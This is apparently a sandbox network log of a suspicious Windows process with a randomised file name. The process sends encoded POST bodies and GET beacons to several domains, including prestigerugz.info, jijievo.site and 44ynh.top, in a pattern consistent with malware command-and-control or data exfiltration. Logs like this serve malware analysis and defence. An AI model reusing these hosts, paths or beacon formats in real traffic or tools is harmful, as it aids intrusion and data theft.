2	192.168.2.4	49900	217.160.0.113	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:46:37.049901962 CET	771	OUT	POST /m5si/ HTTP/1.1 Host: www.prestigerugz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 223 Origin: http://www.prestigerugz.info Referer: http://www.prestigerugz.info/m5si/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2f 61 38 62 53 68 71 4b 4f 51 73 61 7a 74 54 4b 41 46 79 57 48 37 33 34 5a 4b 78 63 48 30 75 39 4a 56 4b 50 4f 67 4a 53 79 50 57 65 39 6a 52 67 4b 33 49 63 70 71 33 45 72 68 43 51 44 71 58 4c 4e 4a 71 61 6e 74 63 76 2f 55 2f 35 77 54 2f 4e 31 50 54 79 79 63 52 67 70 6b 77 77 73 55 68 59 38 69 6d 36 7a 38 77 7a 49 76 6e 42 33 34 32 79 4c 2b 35 70 76 41 48 64 30 79 6d 6c 32 67 2f 37 63 76 46 39 43 71 55 42 54 78 4f 41 36 69 62 6c 34 6c 65 4b 7a 43 76 33 4e 64 62 6a 2b 51 42 4e 58 72 68 57 2b 59 36 33 5a 59 4b 6b 33 44 57 78 4c 56 4e 4d 4f 39 6c 54 43 37 62 59 6f 74 6c 36 43 54 50 32 31 46 32 69 4e 78 67 3d Data Ascii: blO4h0=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0u9JVKPOgJSyPWe9jRgK3Icpq3ErhCQDqXLNJqantcv/U/5wT/N1PTyycRgpkwwsUhY8im6z8wzIvnB342yL+5pvAHd0yml2g/7cvF9CqUBTxOA6ibl4leKzCv3Ndbj+QBNXrhW+Y63ZYKk3DWxLVNMO9lTC7bYotl6CTP21F2iNxg=
Jan 10, 2025 21:46:37.703555107 CET	780	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 10 Jan 2025 20:46:37 GMT Server: Apache X-Frame-Options: deny Content-Encoding: gzip Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED] Data Ascii: 23aTMo@WLP@qzCPZc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <\|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49914	217.160.0.113	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:46:39.597009897 CET	10853	OUT	POST /m5si/ HTTP/1.1 Host: www.prestigerugz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 10303 Origin: http://www.prestigerugz.info Referer: http://www.prestigerugz.info/m5si/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2f 61 38 62 53 68 71 4b 4f 51 73 61 7a 74 54 4b 41 46 79 57 48 37 33 34 5a 4b 78 63 48 30 6d 39 4a 6b 71 50 50 42 4a 53 6f 50 57 65 6a 7a 52 68 4b 33 49 37 70 71 76 49 72 68 66 6c 44 6f 66 4c 4f 70 32 61 6c 63 63 76 78 6b 2f 35 74 6a 2f 49 74 76 53 71 79 63 42 6b 70 6c 41 77 73 55 68 59 38 69 4b 36 6b 39 77 7a 4f 76 6e 43 6d 34 32 32 63 4f 35 42 76 47 76 4e 30 79 7a 59 31 54 48 37 63 50 56 39 41 34 4d 42 4d 42 4f 47 39 69 62 74 34 6c 53 52 7a 43 7a 52 4e 66 36 2b 2b 54 64 4e 62 66 6b 4c 36 73 72 76 41 71 4b 58 6c 77 2b 50 50 58 74 74 4a 74 5a 50 46 70 58 57 30 66 4e 47 42 30 32 49 67 47 32 48 5a 31 51 61 35 4b 73 44 62 79 61 46 35 61 53 54 2f 74 2f 76 6d 55 6e 7a 65 39 44 38 53 2f 61 78 35 75 33 2f 76 68 52 63 78 42 4f 34 4a 53 6c 7a 5a 48 6d 59 34 45 78 4c 4a 4b 6f 46 4c 6f 68 51 67 72 75 49 4c 4d 2f 35 73 49 32 67 4a 68 45 78 6a 2b 32 6e 2f 4d 30 7a 7a 4b 66 75 68 76 76 48 5a 73 4e 6d 4c 79 62 62 33 52 74 78 6f 41 57 53 48 53 2b 6d 78 47 74 [TRUNCATED] Data Ascii: blO4h0=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0m9JkqPPBJSoPWejzRhK3I7pqvIrhflDofLOp2alccvxk/5tj/ItvSqycBkplAwsUhY8iK6k9wzOvnCm422cO5BvGvN0yzY1TH7cPV9A4MBMBOG9ibt4lSRzCzRNf6++TdNbfkL6srvAqKXlw+PPXttJtZPFpXW0fNGB02IgG2HZ1Qa5KsDbyaF5aST/t/vmUnze9D8S/ax5u3/vhRcxBO4JSlzZHmY4ExLJKoFLohQgruILM/5sI2gJhExj+2n/M0zzKfuhvvHZsNmLybb3RtxoAWSHS+mxGt4EgngWEVwIjwKXdgvaeZaSU9J/KUGqwokiZmGJlJ4eDRQ8rSd94L0O86tUpiNiw2bomLWD6Xg33XdMNSawJcFQLp4vwyXfXej9mU88oJ/CNb7k1G8/CjH7GOW0nvWiAOB4h6dYAbvu9TPbchNDbZb0P2AtfFWWNbfeq002lr0GFu7o9NrgeJuDd8m+moseykbAv9EMdu/ovCVd9ocnlFetidSH1TsDLbW34QoJM5ql8hovVThW/p0z93cw3f+/vENxxfQ3WMtHRXknAMNyKAXxHa1jxpLwfgXv5/nAMNEno27WsjqjiIeVz1oJDUOJjcY/PzTZdWfcgz+aiJlqX6eWuMfVD9gTLuvnTGHJB3CEmYXm6sOkneUEA2S7gAqN6+64wrPeewJGOK2cU4EIa9Y40E54NjNZNzo9QEP2YbrpXhxz0BGwnJr4lZq3DIeJyKl44iS0Osi9Lts7FXspLQCfMX6voZDUkczprT9X3cGG0DDG7MqOcV7c89gc2JNhFqZJNXeahJpYfXFdOy1I/gyoDmguFfFZhRRb8FQqaj5goKlcHmJ73+rdaXmJUdTAtkU503M1pEY57pl2NMgrL3FNCLKC4Os6YqJ2aHetBHlnwkU9m8kofs5PWa+M6oZdmVZ1p2x+mfJLJGmhnF/aok0zy2MMdtAGKiDX [TRUNCATED]
Jan 10, 2025 21:46:40.343188047 CET	780	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 10 Jan 2025 20:46:40 GMT Server: Apache X-Frame-Options: deny Content-Encoding: gzip Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED] Data Ascii: 23aTMo@WLP@qzCPZc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <\|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49927	217.160.0.113	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:46:42.138081074 CET	478	OUT	GET /m5si/?blO4h0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&Q4DT=n4tTOrYxhN7 HTTP/1.1 Host: www.prestigerugz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Jan 10, 2025 21:46:42.802758932 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1271 Connection: close Date: Fri, 10 Jan 2025 20:46:42 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
Jan 10, 2025 21:46:42.802772999 CET	203	IN	Data Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50010	154.205.156.26	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:46:56.729383945 CET	736	OUT	POST /521z/ HTTP/1.1 Host: www.jijievo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 Origin: http://www.jijievo.site Referer: http://www.jijievo.site/521z/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 37 48 2b 41 67 72 57 45 6d 38 79 2b 69 68 56 6f 35 51 61 2f 2b 65 63 36 73 51 6a 46 51 39 4e 6b 46 32 34 74 67 78 50 75 6f 79 50 78 46 74 34 4b 33 6c 42 73 32 6d 68 68 49 45 54 51 37 65 62 72 76 4a 48 34 42 59 73 55 4e 48 51 6f 48 59 2b 35 33 51 51 47 6c 51 7a 46 4b 74 61 7a 42 69 5a 4e 76 76 78 52 6f 34 78 77 4b 79 74 4a 63 43 74 35 36 7a 33 6f 6f 68 52 7a 46 5a 35 2f 2b 43 2b 45 35 56 6a 38 2b 66 58 52 41 54 4b 39 53 4c 39 45 7a 61 45 58 33 75 38 65 65 69 70 64 74 43 53 34 35 71 59 6b 36 35 6f 47 52 72 74 69 4f 38 4c 6a 48 32 74 6c 63 67 3d 3d Data Ascii: blO4h0=Vzfg0MdIUfpb7H+AgrWEm8y+ihVo5Qa/+ec6sQjFQ9NkF24tgxPuoyPxFt4K3lBs2mhhIETQ7ebrvJH4BYsUNHQoHY+53QQGlQzFKtazBiZNvvxRo4xwKytJcCt56z3oohRzFZ5/+C+E5Vj8+fXRATK9SL9EzaEX3u8eeipdtCS45qYk65oGRrtiO8LjH2tlcg==
Jan 10, 2025 21:46:58.147804976 CET	241	IN	HTTP/1.1 200 OK Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 20:46:57 GMT Server: nginx Vary: Accept-Encoding Content-Length: 44 Connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50011	154.205.156.26	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:46:59.289797068 CET	756	OUT	POST /521z/ HTTP/1.1 Host: www.jijievo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 223 Origin: http://www.jijievo.site Referer: http://www.jijievo.site/521z/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 6c 6b 46 57 49 74 78 46 62 75 6c 53 50 78 4e 4e 34 50 7a 6c 42 6c 32 6d 74 44 49 41 50 51 37 65 50 72 76 4c 66 34 42 75 6b 56 4d 58 51 71 50 34 2b 37 36 77 51 47 6c 51 7a 46 4b 72 33 63 42 69 68 4e 75 66 42 52 70 61 5a 7a 57 43 74 49 55 69 74 35 73 7a 33 73 6f 68 51 6d 46 64 67 61 2b 41 57 45 35 58 72 38 2f 4f 58 53 4f 54 4b 37 64 72 38 4b 33 66 35 73 37 39 59 53 41 54 42 67 6c 6d 6d 44 78 4d 56 2b 72 49 4a 52 44 72 4a 52 54 37 43 58 4b 31 51 73 48 68 39 70 55 65 45 79 59 37 61 46 4e 77 65 58 53 6f 4c 76 55 5a 6f 3d Data Ascii: blO4h0=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRIlkFWItxFbulSPxNN4PzlBl2mtDIAPQ7ePrvLf4BukVMXQqP4+76wQGlQzFKr3cBihNufBRpaZzWCtIUit5sz3sohQmFdga+AWE5Xr8/OXSOTK7dr8K3f5s79YSATBglmmDxMV+rIJRDrJRT7CXK1QsHh9pUeEyY7aFNweXSoLvUZo=
Jan 10, 2025 21:47:00.712687969 CET	241	IN	HTTP/1.1 200 OK Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 20:47:00 GMT Server: nginx Vary: Accept-Encoding Content-Length: 44 Connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50012	154.205.156.26	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:01.861349106 CET	10838	OUT	POST /521z/ HTTP/1.1 Host: www.jijievo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 10303 Origin: http://www.jijievo.site Referer: http://www.jijievo.site/521z/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 39 6b 45 6e 6f 74 6a 58 7a 75 6b 53 50 78 48 74 34 4f 7a 6c 41 33 32 6d 31 48 49 48 48 71 37 64 33 72 39 61 2f 34 48 63 4d 56 47 58 51 71 4e 34 2b 34 33 51 52 63 6c 51 6a 42 4b 74 58 63 42 69 68 4e 75 63 5a 52 74 49 78 7a 46 53 74 4a 63 43 74 31 36 7a 33 55 6f 68 59 32 46 64 74 76 2b 77 32 45 35 33 37 38 39 38 2f 53 43 54 4b 35 65 72 39 58 33 66 39 7a 37 39 46 68 41 54 46 4f 6c 68 4f 44 7a 64 6b 30 70 35 74 39 53 62 74 4f 49 34 36 71 4f 46 45 50 4a 77 6b 4a 61 4f 64 72 61 4b 79 38 4b 33 6e 4d 4b 59 2f 70 44 74 61 45 58 41 6a 37 46 35 42 2f 37 66 63 33 4f 32 62 43 31 78 77 73 2b 2f 39 45 70 33 36 47 4b 56 39 34 53 5a 68 4d 62 62 2b 48 77 66 58 4b 34 4b 57 6c 75 57 71 32 67 53 56 6a 48 30 36 2b 32 49 6a 51 66 6a 63 55 76 4a 2b 4a 73 30 52 56 69 51 66 79 62 52 2b 78 39 4e 49 4a 45 35 55 62 53 48 69 2b 54 57 67 37 35 68 4a 42 68 46 4d 7a 57 58 63 55 55 6f 78 [TRUNCATED] Data Ascii: blO4h0=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRI9kEnotjXzukSPxHt4OzlA32m1HIHHq7d3r9a/4HcMVGXQqN4+43QRclQjBKtXcBihNucZRtIxzFStJcCt16z3UohY2Fdtv+w2E537898/SCTK5er9X3f9z79FhATFOlhODzdk0p5t9SbtOI46qOFEPJwkJaOdraKy8K3nMKY/pDtaEXAj7F5B/7fc3O2bC1xws+/9Ep36GKV94SZhMbb+HwfXK4KWluWq2gSVjH06+2IjQfjcUvJ+Js0RViQfybR+x9NIJE5UbSHi+TWg75hJBhFMzWXcUUoxVv0SoBKPHOg7XRY0HmYbvShfiG95/DVbsruQNblwGWBjVT7EM4wKd8pH3RiNcALO1Z6BE5Oyz3EYG1GcMqXisBm15DnNiTf3/udZRWa0eJKYihzKqdAPRDmbn2LUtZjZ1RVtyhsl1nECI3nckvbNqX/oNvcAEW3oz2MdkEYzQ2fGfVv/jQIfOaIK5doxLq7SDX6toRGlAHCowgSNwo3lrsxVAwVrssRFw55KAxg2r91Kds+zTDCv95XpwgN2VKFQYCuvbUInPNZF1geBkDCUaLba4ydvFjb3VThezroctjmZj4ARnzwS/vPxTXZ4/v3ES11fvpE8XXrDwxiqrR19D/k3jQB0U1jDTu+Iln+JCOrCcyGjXn1ayTGeFrOtDiwNCqaEK5oRi4uyLn8DStXpcPy9TtZxV/WgudA+TojLCyi+GVOywiG98EoQ+X3H81ngul2e2i5Xv1qWbjf0NgDy+q9X7hKuodRtLEHF9Q69HJRkmKNBY6C9jjF/01i6KOToXLhCfXnKXKNEPiJbkM0SyRfPYEp5gIQ2X2u/GShdsPXUWitg/JgmTC4EiDXB7G5npExLVr3GYisyk4pn4jNr3CGCJtLAiohm6/Vm/Nyh18K0OKkFnRja8b4KPWd6i7Zm9OA6R6uwetBuQBbh5gHKBaHyA2czucWnaA [TRUNCATED]
Jan 10, 2025 21:47:03.258215904 CET	241	IN	HTTP/1.1 200 OK Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 20:47:02 GMT Server: nginx Vary: Accept-Encoding Content-Length: 44 Connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50013	154.205.156.26	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:04.403680086 CET	473	OUT	GET /521z/?blO4h0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&Q4DT=n4tTOrYxhN7 HTTP/1.1 Host: www.jijievo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Jan 10, 2025 21:47:05.928445101 CET	197	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 20:47:05 GMT Server: nginx Vary: Accept-Encoding Content-Length: 24 Connection: close Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e Data Ascii: Unable to get connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50014	38.181.21.178	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:47:11.826111078 CET	727	OUT	POST /l9wb/ HTTP/1.1 Host: www.44ynh.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 Origin: http://www.44ynh.top Referer: http://www.44ynh.top/l9wb/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 37 66 76 69 61 61 53 56 4e 54 56 6a 55 59 35 48 55 4a 5a 31 6b 75 31 31 55 6e 57 4d 47 68 59 78 43 78 2b 63 54 49 46 31 37 78 77 59 43 5a 6a 71 72 4a 61 67 4a 4d 70 52 63 76 39 66 64 62 59 71 45 4c 42 54 79 4d 4d 44 31 4c 32 35 78 39 70 33 6d 34 2b 48 36 4a 4e 61 34 77 69 51 57 64 47 73 62 78 4a 51 4b 62 4d 32 52 30 71 75 61 70 56 58 37 74 4c 4e 72 53 48 72 59 51 63 69 30 36 74 31 4e 74 4c 6b 63 32 52 4b 39 47 76 39 53 4d 33 44 56 62 6f 62 70 4c 4e 58 63 44 59 73 4a 47 39 65 73 73 6d 2f 65 34 43 48 6e 47 72 7a 4b 37 34 4a 31 6b 6a 70 74 41 3d 3d Data Ascii: blO4h0=QIA1AtWFQ3Bg7fviaaSVNTVjUY5HUJZ1ku11UnWMGhYxCx+cTIF17xwYCZjqrJagJMpRcv9fdbYqELBTyMMD1L25x9p3m4+H6JNa4wiQWdGsbxJQKbM2R0quapVX7tLNrSHrYQci06t1NtLkc2RK9Gv9SM3DVbobpLNXcDYsJG9essm/e4CHnGrzK74J1kjptA==
